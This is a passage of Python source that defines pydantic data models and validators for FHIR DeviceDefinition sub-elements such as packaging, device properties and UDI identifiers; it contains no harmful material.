Identifies the standards, specifications, or formal guidances for the
capabilities supported by the device.
Identifies the standards, specifications, or formal guidances for the
capabilities supported by the device. The device may be certified as
conformant to these specifications e.g., communication, performance,
process, measurement, or specialization standards.
"""
resource_type = Field("DeviceDefinitionConformsTo", const=True)
category: fhirtypes.CodeableConceptType = Field(
None,
alias="category",
title=(
"Describes the common type of the standard, specification, or formal "
"guidance"
),
description="Describes the type of the standard, specification, or formal guidance.",
# if property is element of this resource.
element_property=True,
)
source: typing.List[fhirtypes.RelatedArtifactType] = Field(
None,
alias="source",
title=(
"Standard, regulation, certification, or guidance website, document, or"
" other publication, or similar, supporting the conformance"
),
description=None,
# if property is element of this resource.
element_property=True,
)
specification: fhirtypes.CodeableConceptType = Field(
...,
alias="specification",
title=(
"Identifies the standard, specification, or formal guidance that the "
"device adheres to the Device Specification type"
),
description=(
"Code that identifies the specific standard, specification, protocol, "
"formal guidance, regulation, legislation, or certification scheme to "
"which the device adheres."
),
# if property is element of this resource.
element_property=True,
)
version: typing.List[typing.Optional[fhirtypes.String]] = Field(
None,
alias="version",
title=(
"The specific form or variant of the standard, specification or formal "
"guidance"
),
description=(
"Identifies the specific form or variant of the standard, "
"specification, or formal guidance. This may be a 'version number', "
"release, document edition, publication year, or other label."
),
# if property is element of this resource.
element_property=True,
)
version__ext: typing.List[
typing.Union[fhirtypes.FHIRPrimitiveExtensionType, None]
] = Field(None, alias="_version", title="Extension field for ``version``.")
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionConformsTo`` according specification,
with preserving original sequence order.
"""
return [
"id",
"extension",
"modifierExtension",
"category",
"specification",
"version",
"source",
]
class DeviceDefinitionCorrectiveAction(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Tracking of latest field safety corrective action.
"""
resource_type = Field("DeviceDefinitionCorrectiveAction", const=True)
period: fhirtypes.PeriodType = Field(
...,
alias="period",
title="Start and end dates of the corrective action",
description=None,
# if property is element of this resource.
element_property=True,
)
recall: bool = Field(
None,
alias="recall",
title="Whether the corrective action was a recall",
description="Whether the last corrective action known for this device was a recall.",
# if property is element of this resource.
element_property=True,
element_required=True,
)
recall__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_recall", title="Extension field for ``recall``."
)
scope: fhirtypes.Code = Field(
None,
alias="scope",
title="model | lot-numbers | serial-numbers",
description=(
"The scope of the corrective action - whether the action targeted all "
"units of a given device model, or only a specific set of batches "
"identified by lot numbers, or individually identified devices "
"identified by the serial name."
),
# if property is element of this resource.
element_property=True,
        # note: Enum values can be used in validation,
        # but use them at your own responsibility; read the official FHIR documentation.
enum_values=["model", "lot-numbers", "serial-numbers"],
)
scope__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_scope", title="Extension field for ``scope``."
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionCorrectiveAction`` according specification,
with preserving original sequence order.
"""
return ["id", "extension", "modifierExtension", "recall", "scope", "period"]
@root_validator(pre=True, allow_reuse=True)
def validate_required_primitive_elements_3455(
cls, values: typing.Dict[str, typing.Any]
) -> typing.Dict[str, typing.Any]:
"""https://www.hl7.org/fhir/extensibility.html#Special-Case
In some cases, implementers might find that they do not have appropriate data for
an element with minimum cardinality = 1. In this case, the element must be present,
but unless the resource or a profile on it has made the actual value of the primitive
data type mandatory, it is possible to provide an extension that explains why
the primitive value is not present.
"""
required_fields = [("recall", "recall__ext")]
_missing = object()
def _fallback():
return ""
errors: typing.List["ErrorWrapper"] = []
for name, ext in required_fields:
field = cls.__fields__[name]
ext_field = cls.__fields__[ext]
value = values.get(field.alias, _missing)
if value not in (_missing, None):
continue
ext_value = values.get(ext_field.alias, _missing)
missing_ext = True
if ext_value not in (_missing, None):
if isinstance(ext_value, dict):
missing_ext = len(ext_value.get("extension", [])) == 0
elif (
getattr(ext_value.__class__, "get_resource_type", _fallback)()
== "FHIRPrimitiveExtension"
):
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
else:
validate_pass = True
for validator in ext_field.type_.__get_validators__():
try:
ext_value = validator(v=ext_value)
except ValidationError as exc:
errors.append(ErrorWrapper(exc, loc=ext_field.alias))
validate_pass = False
if not validate_pass:
continue
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
if missing_ext:
if value is _missing:
errors.append(ErrorWrapper(MissingError(), loc=field.alias))
else:
errors.append(
ErrorWrapper(NoneIsNotAllowedError(), loc=field.alias)
)
if len(errors) > 0:
raise ValidationError(errors, cls) # type: ignore
return values
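# --- Hedged sketch (not part of this module) --------------------------------
# The special case the validator above implements, reduced to a predicate on
# dict-shaped input: a required primitive may be absent only when its paired
# ``_field`` extension carries at least one extension entry. Hypothetical
# helper; the real validator also handles FHIRPrimitiveExtension objects.
def _demo_required_primitive_ok(values: dict, name: str) -> bool:
    if values.get(name) is not None:
        return True
    ext = values.get(f"_{name}")
    return isinstance(ext, dict) and len(ext.get("extension", [])) > 0

# e.g. _demo_required_primitive_ok({"recall": True}, "recall") -> True
#      _demo_required_primitive_ok({"_recall": {"extension": [{"url": "u"}]}}, "recall") -> True
#      _demo_required_primitive_ok({}, "recall") -> False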
class DeviceDefinitionDeviceName(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
The name or names of the device as given by the manufacturer.
"""
resource_type = Field("DeviceDefinitionDeviceName", const=True)
name: fhirtypes.String = Field(
None,
alias="name",
title="A name that is used to refer to the device",
description=(
"A human-friendly name that is used to refer to the device - depending "
"on the type, it can be the brand name, the common name or alias, or "
"other."
),
# if property is element of this resource.
element_property=True,
element_required=True,
)
name__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_name", title="Extension field for ``name``."
)
type: fhirtypes.Code = Field(
None,
alias="type",
title="registered-name | user-friendly-name | patient-reported-name",
description=(
"The type of deviceName. RegisteredName | UserFriendlyName | "
"PatientReportedName."
),
# if property is element of this resource.
element_property=True,
element_required=True,
        # note: Enum values can be used in validation,
        # but use them at your own responsibility; read the official FHIR documentation.
enum_values=["registered-name", "user-friendly-name", "patient-reported-name"],
)
type__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_type", title="Extension field for ``type``."
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionDeviceName`` according specification,
with preserving original sequence order.
"""
return ["id", "extension", "modifierExtension", "name", "type"]
@root_validator(pre=True, allow_reuse=True)
def validate_required_primitive_elements_2771(
cls, values: typing.Dict[str, typing.Any]
) -> typing.Dict[str, typing.Any]:
"""https://www.hl7.org/fhir/extensibility.html#Special-Case
In some cases, implementers might find that they do not have appropriate data for
an element with minimum cardinality = 1. In this case, the element must be present,
but unless the resource or a profile on it has made the actual value of the primitive
data type mandatory, it is possible to provide an extension that explains why
the primitive value is not present.
"""
required_fields = [("name", "name__ext"), ("type", "type__ext")]
_missing = object()
def _fallback():
return ""
errors: typing.List["ErrorWrapper"] = []
for name, ext in required_fields:
field = cls.__fields__[name]
ext_field = cls.__fields__[ext]
value = values.get(field.alias, _missing)
if value not in (_missing, None):
continue
ext_value = values.get(ext_field.alias, _missing)
missing_ext = True
if ext_value not in (_missing, None):
if isinstance(ext_value, dict):
missing_ext = len(ext_value.get("extension", [])) == 0
elif (
getattr(ext_value.__class__, "get_resource_type", _fallback)()
== "FHIRPrimitiveExtension"
):
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
else:
validate_pass = True
for validator in ext_field.type_.__get_validators__():
try:
ext_value = validator(v=ext_value)
except ValidationError as exc:
errors.append(ErrorWrapper(exc, loc=ext_field.alias))
validate_pass = False
if not validate_pass:
continue
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
if missing_ext:
if value is _missing:
errors.append(ErrorWrapper(MissingError(), loc=field.alias))
else:
errors.append(
ErrorWrapper(NoneIsNotAllowedError(), loc=field.alias)
)
if len(errors) > 0:
raise ValidationError(errors, cls) # type: ignore
return values
class DeviceDefinitionGuideline(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Information aimed at providing directions for the usage of this model of
device.
"""
resource_type = Field("DeviceDefinitionGuideline", const=True)
contraindication: typing.List[fhirtypes.CodeableConceptType] = Field(
None,
alias="contraindication",
title=(
"A specific situation when a device should not be used because it may "
"cause harm"
),
description=None,
# if property is element of this resource.
element_property=True,
)
indication: typing.List[fhirtypes.CodeableConceptType] = Field(
None,
alias="indication",
title="A clinical condition for which the device was designed to be used",
description=None,
# if property is element of this resource.
element_property=True,
)
intendedUse: fhirtypes.String = Field(
None,
alias="intendedUse",
title=(
"A description of the general purpose or medical use of the device or "
"its function"
),
description=None,
# if property is element of this resource.
element_property=True,
)
intendedUse__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_intendedUse", title="Extension field for ``intendedUse``."
)
relatedArtifact: typing.List[fhirtypes.RelatedArtifactType] = Field(
None,
alias="relatedArtifact",
title="A source of information or reference for this guideline",
description=None,
# if property is element of this resource.
element_property=True,
)
usageInstruction: fhirtypes.Markdown = Field(
None,
alias="usageInstruction",
title=(
"Detailed written and visual directions for the user on how to use the "
"device"
),
description=None,
# if property is element of this resource.
element_property=True,
)
usageInstruction__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None,
alias="_usageInstruction",
title="Extension field for ``usageInstruction``.",
)
useContext: typing.List[fhirtypes.UsageContextType] = Field(
None,
alias="useContext",
title="The circumstances that form the setting for using the device",
description=None,
# if property is element of this resource.
element_property=True,
)
warning: typing.List[fhirtypes.CodeableConceptType] = Field(
None,
alias="warning",
title=(
"Specific hazard alert information that a user needs to know before "
"using the device"
),
description=None,
# if property is element of this resource.
element_property=True,
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionGuideline`` according specification,
with preserving original sequence order.
"""
return [
"id",
"extension",
"modifierExtension",
"useContext",
"usageInstruction",
"relatedArtifact",
"indication",
"contraindication",
"warning",
"intendedUse",
]
class DeviceDefinitionHasPart(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
A device, part of the current one.
A device that is part (for example a component) of the present device.
"""
resource_type = Field("DeviceDefinitionHasPart", const=True)
count: fhirtypes.Integer = Field(
None,
alias="count",
title="Number of occurrences of the part",
description="Number of instances of the component device in the current device.",
# if property is element of this resource.
element_property=True,
)
count__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_count", title="Extension field for ``count``."
)
reference: fhirtypes.ReferenceType = Field(
...,
alias="reference",
title="Reference to the part",
description="Reference to the device that is part of the current device.",
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["DeviceDefinition"],
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionHasPart`` according specification,
with preserving original sequence order.
"""
return ["id", "extension", "modifierExtension", "reference", "count"]
class DeviceDefinitionLink(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
An associated device, attached to, used with, communicating with or linking
a previous or new device model to the focal device.
"""
resource_type = Field("DeviceDefinitionLink", const=True)
relatedDevice: fhirtypes.CodeableReferenceType = Field(
...,
alias="relatedDevice",
title="A reference to the linked device",
description=None,
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["DeviceDefinition"],
)
relation: fhirtypes.CodingType = Field(
...,
alias="relation",
title=(
"The type indicates the relationship of the related device to the "
"device instance"
),
description=None,
# if property is element of this resource.
element_property=True,
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionLink`` according specification,
with preserving original sequence order.
"""
return ["id", "extension", "modifierExtension", "relation", "relatedDevice"]
class DeviceDefinitionMaterial(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
A substance used to create the material(s) of which the device is made.
"""
resource_type = Field("DeviceDefinitionMaterial", const=True)
allergenicIndicator: bool = Field(
None,
alias="allergenicIndicator",
title="Whether the substance is a known or suspected allergen",
description=None,
# if property is element of this resource.
element_property=True,
)
allergenicIndicator__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None,
alias="_allergenicIndicator",
title="Extension field for ``allergenicIndicator``.",
)
alternate: bool = Field(
None,
alias="alternate",
title="Indicates an alternative material of the device",
description=None,
# if property is element of this resource.
element_property=True,
)
alternate__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_alternate", title="Extension field for ``alternate``."
)
substance: fhirtypes.CodeableConceptType = Field(
...,
alias="substance",
title=(
"A relevant substance that the device contains, may contain, or is made"
" of"
),
description=(
"A substance that the device contains, may contain, or is made of - for"
" example latex - to be used to determine patient compatibility. This "
"is not intended to represent the composition of the device, only the "
"clinically relevant materials."
),
# if property is element of this resource.
element_property=True,
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionMaterial`` according specification,
with preserving original sequence order.
"""
return [
"id",
"extension",
"modifierExtension",
"substance",
"alternate",
"allergenicIndicator",
]
class DeviceDefinitionPackaging(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Information about the packaging of the device, i.e. how the device is
packaged.
"""
resource_type = Field("DeviceDefinitionPackaging", const=True)
count: fhirtypes.Integer = Field(
None,
alias="count",
title="The number of items contained in the package (devices or sub-packages)",
description=None,
# if property is element of this resource.
element_property=True,
)
count__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_count", title="Extension field for ``count``."
)
distributor: typing.List[
fhirtypes.DeviceDefinitionPackagingDistributorType
] = Field(
None,
alias="distributor",
title="An organization that distributes the packaged device",
description=None,
# if property is element of this resource.
element_property=True,
)
identifier: fhirtypes.IdentifierType = Field(
None,
alias="identifier",
title="Business identifier of the packaged medication",
description="The business identifier of the packaged medication.",
# if property is element of this resource.
element_property=True,
)
packaging: typing.List[fhirtypes.DeviceDefinitionPackagingType] = Field(
None,
alias="packaging",
title="Allows packages within packages",
description=None,
# if property is element of this resource.
element_property=True,
)
type: fhirtypes.CodeableConceptType = Field(
None,
alias="type",
title="A code that defines the specific type of packaging",
description=None,
# if property is element of this resource.
element_property=True,
)
udiDeviceIdentifier: typing.List[
fhirtypes.DeviceDefinitionUdiDeviceIdentifierType
] = Field(
None,
alias="udiDeviceIdentifier",
title="Unique Device Identifier (UDI) Barcode string on the packaging",
description=None,
# if property is element of this resource.
element_property=True,
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionPackaging`` according specification,
with preserving original sequence order.
"""
return [
"id",
"extension",
"modifierExtension",
"identifier",
"type",
"count",
"distributor",
"udiDeviceIdentifier",
"packaging",
]
class DeviceDefinitionPackagingDistributor(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
An organization that distributes the packaged device.
"""
resource_type = Field("DeviceDefinitionPackagingDistributor", const=True)
name: fhirtypes.String = Field(
None,
alias="name",
title="Distributor's human-readable name",
description=None,
# if property is element of this resource.
element_property=True,
)
name__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_name", title="Extension field for ``name``."
)
organizationReference: typing.List[fhirtypes.ReferenceType] = Field(
None,
alias="organizationReference",
title="Distributor as an Organization resource",
description=None,
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["Organization"],
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionPackagingDistributor`` according specification,
with preserving original sequence order.
"""
return ["id", "extension", "modifierExtension", "name", "organizationReference"]
class DeviceDefinitionProperty(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Inherent, essentially fixed, characteristics of this kind of device, e.g.,
time properties, size, etc.
Static or essentially fixed characteristics or features of this kind of
device that are otherwise not captured in more specific attributes, e.g.,
time or timing attributes, resolution, accuracy, and physical attributes.
"""
resource_type = Field("DeviceDefinitionProperty", const=True)
type: fhirtypes.CodeableConceptType = Field(
...,
alias="type",
title="Code that specifies the property being represented",
description=(
"Code that specifies the property such as a resolution or color being "
"represented."
),
# if property is element of this resource.
element_property=True,
)
valueAttachment: fhirtypes.AttachmentType = Field(
None,
alias="valueAttachment",
title="Value of the property",
description=(
"The value of the property specified by the associated property.type "
"code."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e value[x]
one_of_many="value",
one_of_many_required=True,
)
valueBoolean: bool = Field(
None,
alias="valueBoolean",
title="Value of the property",
description=(
"The value of the property specified by the associated property.type "
"code."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e value[x]
one_of_many="value",
one_of_many_required=True,
)
valueBoolean__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_valueBoolean", title="Extension field for ``valueBoolean``."
)
valueCodeableConcept: fhirtypes.CodeableConceptType = Field(
None,
alias="valueCodeableConcept",
title="Value of the property",
description=(
"The value of the property specified by the associated property.type "
"code."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e value[x]
one_of_many="value",
one_of_many_required=True,
)
valueInteger: fhirtypes.Integer = Field(
None,
alias="valueInteger",
title="Value of the property",
description=(
"The value of the property specified by the associated property.type "
"code."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e value[x]
one_of_many="value",
one_of_many_required=True,
)
valueInteger__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_valueInteger", title="Extension field for ``valueInteger``."
)
valueQuantity: fhirtypes.QuantityType = Field(
None,
alias="valueQuantity",
title="Value of the property",
description=(
"The value of the property specified by the associated property.type "
"code."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e value[x]
one_of_many="value",
one_of_many_required=True,
)
valueRange: fhirtypes.RangeType = Field(
None,
alias="valueRange",
title="Value of the property",
description=(
"The value of the property specified by the associated property.type "
"code."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e value[x]
one_of_many="value",
one_of_many_required=True,
)
valueString: fhirtypes.String = Field(
None,
alias="valueString",
title="Value of the property",
description=(
"The value of the property specified by the associated property.type "
"code."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e value[x]
one_of_many="value",
one_of_many_required=True,
)
valueString__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_valueString", title="Extension field for ``valueString``."
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionProperty`` according specification,
with preserving original sequence order.
"""
return [
"id",
"extension",
"modifierExtension",
"type",
"valueQuantity",
"valueCodeableConcept",
"valueString",
"valueBoolean",
"valueInteger",
"valueRange",
"valueAttachment",
]
@root_validator(pre=True, allow_reuse=True)
def validate_one_of_many_2683(
cls, values: typing.Dict[str, typing.Any]
) -> typing.Dict[str, typing.Any]:
"""https://www.hl7.org/fhir/formats.html#choice
A few elements have a choice of more than one data type for their content.
All such elements have a name that takes the form nnn[x].
The "nnn" part of the name is constant, and the "[x]" is replaced with
the title-cased name of the type that is actually used.
The table view shows each of these names explicitly.
Elements that have a choice of data type cannot repeat - they must have a
maximum cardinality of 1. When constructing an instance of an element with a
choice of types, the authoring system must create a single element with a
data type chosen from among the list of permitted data types.
"""
one_of_many_fields = {
"value": [
"valueAttachment",
"valueBoolean",
"valueCodeableConcept",
"valueInteger",
"valueQuantity",
"valueRange",
"valueString",
]
}
for prefix, fields in one_of_many_fields.items():
assert cls.__fields__[fields[0]].field_info.extra["one_of_many"] == prefix
required = (
cls.__fields__[fields[0]].field_info.extra["one_of_many_required"]
is True
)
found = False
for field in fields:
if field in values and values[field] is not None:
if found is True:
raise ValueError(
"Any of one field value is expected from "
f"this list {fields}, but got multiple!"
)
else:
found = True
if required is True and found is False:
raise ValueError(f"Expect any of field value from this list {fields}.")
return values
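# Illustrative sketch (not part of the generated model): the one-of-many
# validator above accepts exactly one value[x] field. The field values below
# are made-up placeholders, assuming pydantic coerces the dict into a
# CodeableConcept.
#
#   DeviceDefinitionProperty(
#       type={"text": "resolution"}, valueString="1920x1080"
#   )  # OK: a single value[x] field is set
#
#   DeviceDefinitionProperty(
#       type={"text": "resolution"}, valueString="high", valueBoolean=True
#   )  # raises ValidationError: multiple value[x] fields are set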
class DeviceDefinitionRegulatoryIdentifier(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Regulatory identifier(s) associated with this device.
Identifier associated with the regulatory documentation (certificates,
technical documentation, post-market surveillance documentation and
reports) of a set of device models sharing the same intended purpose, risk
class and essential design and manufacturing characteristics. One example
is the Basic UDI-DI in Europe.
"""
resource_type = Field("DeviceDefinitionRegulatoryIdentifier", const=True)
deviceIdentifier: fhirtypes.String = Field(
None,
alias="deviceIdentifier",
title="The identifier itself",
description=None,
# if property is element of this resource.
element_property=True,
element_required=True,
)
deviceIdentifier__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None,
alias="_deviceIdentifier",
title="Extension field for ``deviceIdentifier``.",
)
issuer: fhirtypes.Uri = Field(
None,
alias="issuer",
title="The organization that issued this identifier",
description=None,
# if property is element of this resource.
element_property=True,
element_required=True,
)
issuer__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_issuer", title="Extension field for ``issuer``."
)
jurisdiction: fhirtypes.Uri = Field(
None,
alias="jurisdiction",
title="The jurisdiction to which the deviceIdentifier applies",
description=None,
# if property is element of this resource.
element_property=True,
element_required=True,
)
jurisdiction__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_jurisdiction", title="Extension field for ``jurisdiction``."
)
type: fhirtypes.Code = Field(
None,
alias="type",
title="basic | master | license",
description="The type of identifier itself.",
# if property is element of this resource.
element_property=True,
element_required=True,
# note: Enum values can be used in validation,
        # but use them at your own responsibility; read the official FHIR documentation.
enum_values=["basic", "master", "license"],
)
type__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_type", title="Extension field for ``type``."
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionRegulatoryIdentifier`` according specification,
with preserving original sequence order.
"""
return [
"id",
"extension",
"modifierExtension",
"type",
"deviceIdentifier",
"issuer",
"jurisdiction",
]
@root_validator(pre=True, allow_reuse=True)
def validate_required_primitive_elements_3904(
cls, values: typing.Dict[str, typing.Any]
) -> typing.Dict[str, typing.Any]:
"""https://www.hl7.org/fhir/extensibility.html#Special-Case
In some cases, implementers might find that they do not have appropriate data for
an element with minimum cardinality = 1. In this case, the element must be present,
but unless the resource or a profile on it has made the actual value of the primitive
data type mandatory, it is possible to provide an extension that explains why
the primitive value is not present.
"""
required_fields = [
("deviceIdentifier", "deviceIdentifier__ext"),
("issuer", "issuer__ext"),
("jurisdiction", "jurisdiction__ext"),
("type", "type__ext"),
]
_missing = object()
def _fallback():
return ""
errors: typing.List["ErrorWrapper"] = []
for name, ext in required_fields:
field = cls.__fields__[name]
ext_field = cls.__fields__[ext]
value = values.get(field.alias, _missing)
if value not in (_missing, None):
continue
ext_value = values.get(ext_field.alias, _missing)
missing_ext = True
if ext_value not in (_missing, None):
if isinstance(ext_value, dict):
missing_ext = len(ext_value.get("extension", [])) == 0
elif (
getattr(ext_value.__class__, "get_resource_type", _fallback)()
== "FHIRPrimitiveExtension"
):
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
else:
validate_pass = True
for validator in ext_field.type_.__get_validators__():
try:
ext_value = validator(v=ext_value)
except ValidationError as exc:
errors.append(ErrorWrapper(exc, loc=ext_field.alias))
validate_pass = False
if not validate_pass:
continue
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
if missing_ext:
if value is _missing:
errors.append(ErrorWrapper(MissingError(), loc=field.alias))
else:
errors.append(
ErrorWrapper(NoneIsNotAllowedError(), loc=field.alias)
)
if len(errors) > 0:
raise ValidationError(errors, cls) # type: ignore
return values
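# Illustrative sketch (not part of the generated model): the validator above
# implements the FHIR special case for required primitives. URLs and values
# below are made-up placeholders.
#
#   # OK: deviceIdentifier itself is absent, but its extension explains why.
#   DeviceDefinitionRegulatoryIdentifier(
#       issuer="http://example.org", jurisdiction="http://example.org",
#       type="basic",
#       deviceIdentifier__ext={
#           "extension": [{"url": "http://example.org/why-missing"}]
#       },
#   )
#
#   # Raises ValidationError: deviceIdentifier is missing and has no extension.
#   DeviceDefinitionRegulatoryIdentifier(
#       issuer="http://example.org", jurisdiction="http://example.org", type="basic"
#   )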
class DeviceDefinitionUdiDeviceIdentifier(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Unique Device Identifier (UDI) Barcode string.
Unique device identifier (UDI) assigned to device label or package. Note
that the Device may include multiple udiCarriers as it either may include
just the udiCarrier for the jurisdiction it is sold, or for multiple
jurisdictions it could have been sold.
"""
resource_type = Field("DeviceDefinitionUdiDeviceIdentifier", const=True)
deviceIdentifier: fhirtypes.String = Field(
None,
alias="deviceIdentifier",
title=(
"The identifier that is to be associated with every Device that "
"references this DeviceDefintiion for the issuer and jurisdiction "
"provided in the DeviceDefinition.udiDeviceIdentifier"
),
description=None,
# if property is element of this resource.
element_property=True,
element_required=True,
)
deviceIdentifier__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None,
alias="_deviceIdentifier",
title="Extension field for ``deviceIdentifier``.",
)
issuer: fhirtypes.Uri = Field(
None,
alias="issuer",
title="The organization that assigns the identifier algorithm",
description=None,
# if property is element of this resource.
element_property=True,
element_required=True,
)
issuer__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_issuer", title="Extension field for ``issuer``."
)
jurisdiction: fhirtypes.Uri = Field(
None,
alias="jurisdiction",
title="The jurisdiction to which the deviceIdentifier applies",
description=None,
# if property is element of this resource.
element_property=True,
element_required=True,
)
jurisdiction__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_jurisdiction", title="Extension field for ``jurisdiction``."
)
marketDistribution: typing.List[
fhirtypes.DeviceDefinitionUdiDeviceIdentifierMarketDistributionType
] = Field(
None,
alias="marketDistribution",
title="Indicates whether and when the device is available on the market",
description="Indicates where and when the device is available on the market.",
# if property is element of this resource.
element_property=True,
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionUdiDeviceIdentifier`` according specification,
with preserving original sequence order.
"""
return [
"id",
"extension",
"modifierExtension",
"deviceIdentifier",
"issuer",
"jurisdiction",
"marketDistribution",
]
@root_validator(pre=True, allow_reuse=True)
def validate_required_primitive_elements_3716(
cls, values: typing.Dict[str, typing.Any]
) -> typing.Dict[str, typing.Any]:
"""https://www.hl7.org/fhir/extensibility.html#Special-Case
In some cases, implementers might find that they do not have appropriate data for
an element with minimum cardinality = 1. In this case, the element must be present,
but unless the resource or a profile on it has made the actual value of the primitive
data type mandatory, it is possible to provide an extension that explains why
the primitive value is not present.
"""
required_fields = [
("deviceIdentifier", "deviceIdentifier__ext"),
("issuer", "issuer__ext"),
("jurisdiction", "jurisdiction__ext"),
]
_missing = object()
def _fallback():
return ""
errors: typing.List["ErrorWrapper"] = []
for name, ext in required_fields:
field = cls.__fields__[name]
ext_field = cls.__fields__[ext]
value = values.get(field.alias, _missing)
if value not in (_missing, None):
continue
ext_value = values.get(ext_field.alias, _missing)
missing_ext = True
if ext_value not in (_missing, None):
if isinstance(ext_value, dict):
missing_ext = len(ext_value.get("extension", [])) == 0
elif (
getattr(ext_value.__class__, "get_resource_type", _fallback)()
== "FHIRPrimitiveExtension"
):
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
else:
validate_pass = True
for validator in ext_field.type_.__get_validators__():
try:
ext_value = validator(v=ext_value)
except ValidationError as exc:
errors.append(ErrorWrapper(exc, loc=ext_field.alias))
validate_pass = False
if not validate_pass:
continue
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
if missing_ext:
if value is _missing:
errors.append(ErrorWrapper(MissingError(), loc=field.alias))
else:
errors.append(
ErrorWrapper(NoneIsNotAllowedError(), loc=field.alias)
)
if len(errors) > 0:
raise ValidationError(errors, cls) # type: ignore
return values
class DeviceDefinitionUdiDeviceIdentifierMarketDistribution(
backboneelement.BackboneElement
):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Indicates whether and when the device is available on the market.
Indicates where and when the device is available on the market.
"""
resource_type = Field(
"DeviceDefinitionUdiDeviceIdentifierMarketDistribution", const=True
)
marketPeriod: fhirtypes.PeriodType = Field(
...,
alias="marketPeriod",
title="Begin and end dates for the commercial distribution of the device",
description=None,
# if property is element of this resource.
element_property=True,
)
subJurisdiction: fhirtypes.Uri = Field(
None,
alias="subJurisdiction",
title="National state or territory where the device is commercialized",
description=(
"National state or territory to which the marketDistribution recers, "
"typically where the device is commercialized."
),
# if property is element of this resource.
element_property=True,
element_required=True,
)
